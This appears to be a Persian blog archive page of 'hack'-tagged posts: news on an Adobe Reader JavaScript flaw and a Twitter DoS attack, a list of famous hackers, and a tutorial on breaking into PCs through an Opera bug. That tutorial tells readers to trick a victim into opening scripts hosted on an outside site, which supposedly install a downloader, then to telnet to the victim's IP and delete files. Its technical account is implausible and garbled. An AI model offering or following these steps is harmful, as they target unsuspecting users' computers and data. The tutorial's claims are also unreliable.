نوشته های با برچسب ‘هک’

مطالب بعدی »

حملات مخرب ادوبی اکروبات را هدف قرار می دهند

آذر ۲۶م, ۱۳۸۸ | نویسنده:

شرکت های امنیتی و گروهای تحقیقاتی در روز دوشنبه خبر از تشدید حملات مخرب علیه نرم افزارهای Adobe Acrobat  و Adobe Reader داده اند.

این نقص امنیتی که در کتابخانه توابع جاوا اسکریپت رخ می دهد به مهاجم این اجازه را می دهد که بطور غیر محسوس برنامه دلخواه خود را بر روی سیستم قربانی اجرا نماید.

بر طبق گزارش سایت امنیتی SecurityFocus، کد مخرب این آسیب پذیری از روز جمعه گذشته  پخش گردیده است. گفتنی است که وجود نقص های امنیتی اصلاح نشده در نرم افزارهایی همچون ادوبی ریدر، اکروبات ریدر و یا فلاش می توانند بسیار خطرناک عمل کنند زیرا تقریبا همه رایانه های شخصی از عملکرد این برنامه ها پشتیبانی می کنند.

بنیان ShadowServer به کاربران پیشنهاد می کند که از از طریق گزینه Preferences استفاده از JavaScrip را غیر فعال کنند.

شرکت سیمانتک نیز از کاربران درخواست کرده است که تا زمان انتشار اصلاحیه مربوطه با احتیاط لازم ضمیمه های PDF را اجرا نمایند.

منبع : وین بتا

ارسال در : آموزش, ترفند | برچسب ها: , , , , , , | بدون نظر »

مشهورترین هکرهای جهان را بشناسید

آذر ۱۶م, ۱۳۸۸ | نویسنده:

فرد نفوذی به داخل سیستم نامه های الکترونیکی پایگاه مطالعاتی آب و هوا در انگلستان، نامه ها و مدارکی را از این پایگاه بر روی اینترنت منتشر کرده که نشان می دهد دانشمندان با پیچیده کردن اطلاعات و فریب مردم قصد باوراندن تئوری گرمای جهانی را دارند اما دانشمندان اعلام کرده اند متن این نامه ها تغییر پیدا کرده و تنها نشان می دهند که دانشمندان در حال گفتگوهای بی پرده و صریح در رابطه با بحران گرمای جهانی بوده اند.

Hacker logo

در ادامه لیستی از مشهورترین هکرهای جهان که هر یک خسارات قابل توجهی را به شرکتهای مختلف وارد آورده اند و در نشریه تلگراف منتشر شده است، ارائه می شود.

کوین میتنیک:

KEVIN MITNICK

شاید یکی از مشهورترین هکرهای جهان در نسل خود کوین میتنیک باشد. وزارت دادگستری ایالات متحده آمریکا از این فرد به عنوان “بزرگترین مجرم رایانه ای در تاریخ آمریکا” یاد می کند. وی با نام مستعار Hacker Poster Boy به سیستم رایانه ای برخی از مهمترین شرکتهای فناوری و ارتباطاتی از قبیل نوکیا، فوجیتسو و موتورولا نفوذ کرد. وی سرانجام در سال ۱۹۹۵ توسط FBI بازداشت شده و با اعتراف به چندین اتهام وارد شده به پنج سال زندان محکوم شد. پس از آزادی در سال ۲۰۰۰ میتنیک اکنون ریاستشرکت مشاور ایمنی رایانه ای را به عهده داشته و از تکنیکهای هک به عنوان مهندسی اجتماعی یاد می کند.

ادامه مطلب… ادامه مطلب »

ارسال در : نرم افزار متفرقه | برچسب ها: , , , , , , | یک نظر »

آموزش: نفوض از طریق مرورگر محبوب opera

آذر ۱۶م, ۱۳۸۸ | نویسنده:
چندی پیش باگی در مرورگر مشهور Opera توسط خوده شرکت کشف شد! این باگ که در یکی از شاخه های java Scrip نرم افزار هست، باعث می شود که شما به راحتی بتوانید کدهای خودتون را بفرستید و جواب بگیرید! البته این نکته را هم بگویم که Opera روش نفوذ را نگفته است، فقط از وجود باگ خبر داده، هکرهای عزیز هم پیداش کردند!
جالب تر اینجاست خوده شرکت اعتراف کرده است این باگ را توسط Fuzzer های شرکت رقیب یعنی Mozilla کشف کرده. حالا طریقه ی نفوذ از این طریق را بررسی می کنیم.
نیاز به سایتی داریم که Java Scrip را ساپورت کند و همچنین PHP و HTML را. که سایتی که HTML ساپورت نکند اصلا نیست و PHP هم بیشتر سایتهای امروزی ساپورت می کند جاوا هم همین طور.
خوب اول این قربانی را مجبور کنید از طریق Opera فایل زیر را باز کند:
http://illidan.parsaspace.com/Sahand/Ms.js
خوب زبان برای مرورگر کاملاً ناشخته است و به چندین علامت سوال عجیب بر خورد می کند. خوب Shell از سیستم قربانی گرفته شد و حالا ما آماده ی ورود به کامپیوترش هستیم، حالا لینک بعدی را بهش می دهیم:
http://illidan.parsaspace.com/Sahand/Login.php
مرورگر قربانی Error می دهد و هیچ چیزی را نمایش نمی دهد خوب حالا ببینیم چه اتفاقی در این حین افتاد:
فایل اولی را مرورگر نسبت به آن آسیب پذیری نشان داد و باعث شد در کار مرورگر دخالت به وجود آید و کنترل مرورگر بر فایلهای جاوا از بین برده شود.
فایل دومی  باعث می شود یک Downloader جاوا در سیستم قربانی کپی بشود و شروع به دانلود فایل دیگری از سروری که قرار نیست شما و من بدانیم می کند! ( فایل ویروس نیست یک سری کد هست)
خوب حالا باید IP قربانی را  بدست بیاورید خیلی راحت می توانید IP فرد را بگیرید،  Shellگرفتن کامل شد، حالا به Command Prompt بروید و این دستور را بنویسید:
Telnet XXX.XXX.XX 870
خوب فقط جای XXX ها،  IPفرد را بنویسید و Enter را بزنید دستور زیر ظاهر می گردد:
C:Operadiropera.exe
خوب اگر فرض کنیم طرف Opera را در آدرس C:Operadir نصب کرده شما به فایل Opera متصل می شوید.
حالا توی PC قربانی به سر می برید، خیلی راحت از طریق فرمان Cd به پوشه های مختلف و رفته و با فرمان del فایلها را پاک کنید!
و اگر وارد باشید حتی می توانید فایل ایجاد، کپی، تغییر نام، آپلود و … را انجام دهید.

چندی پیش باگی در مرورگر مشهور Opera توسط خوده شرکت کشف شد! این باگ که در یکی از شاخه های java Scrip نرم افزار هست، باعث می شود که شما به راحتی بتوانید کدهای خودتون را بفرستید و جواب بگیرید! البته این نکته را هم بگویم که Opera روش نفوذ را نگفته است، فقط از وجود باگ خبر داده، هکرهای عزیز هم پیداش کردند!

ادامه مطلب… ادامه مطلب »

ارسال در : آموزش, ترفند | برچسب ها: , , , , , , | بدون نظر »

هکر تو ییتر شناسایی شد

مرداد ۲۰م, ۱۳۸۸ | نویسنده:

کارشناسان بعد از بررسی فراوان موفق به شناسایی عامل اصلی از کار افتادن سایت توییتر شدند.

به گزارش بخش خبر شبکه فن آوری اطلاعات ایران، از فارس، به نظر می رسد حمله به یک بلاگر اهل گرجستان با اسم کاربری Cyxymu و از دسترس خارج کردن نوشته های او عامل اصلی این حمله بوده است. اما این کار در عمل موجب شد به میلیون ها نفر خسارت وارد شود.
کاربران توئیتر در روزهای پنج شنبه و جمعه برای دسترسی به این سایت با مشکل مواجه بودند.
این حملات که فیس بوک را هم نشانه گرفته بود مشکلاتی را برای این سایت هم به وجود آورد. خرابکاری یاد شده از نوع DOS بوده و با استفاده از هزاران رایانه انجام می شد که در نقاط مختلف جهان قرار دارند.

ارسال در : نرم افزار متفرقه | برچسب ها: , , , , | بدون نظر »
مطالب بعدی »
موضوعات
امار سایت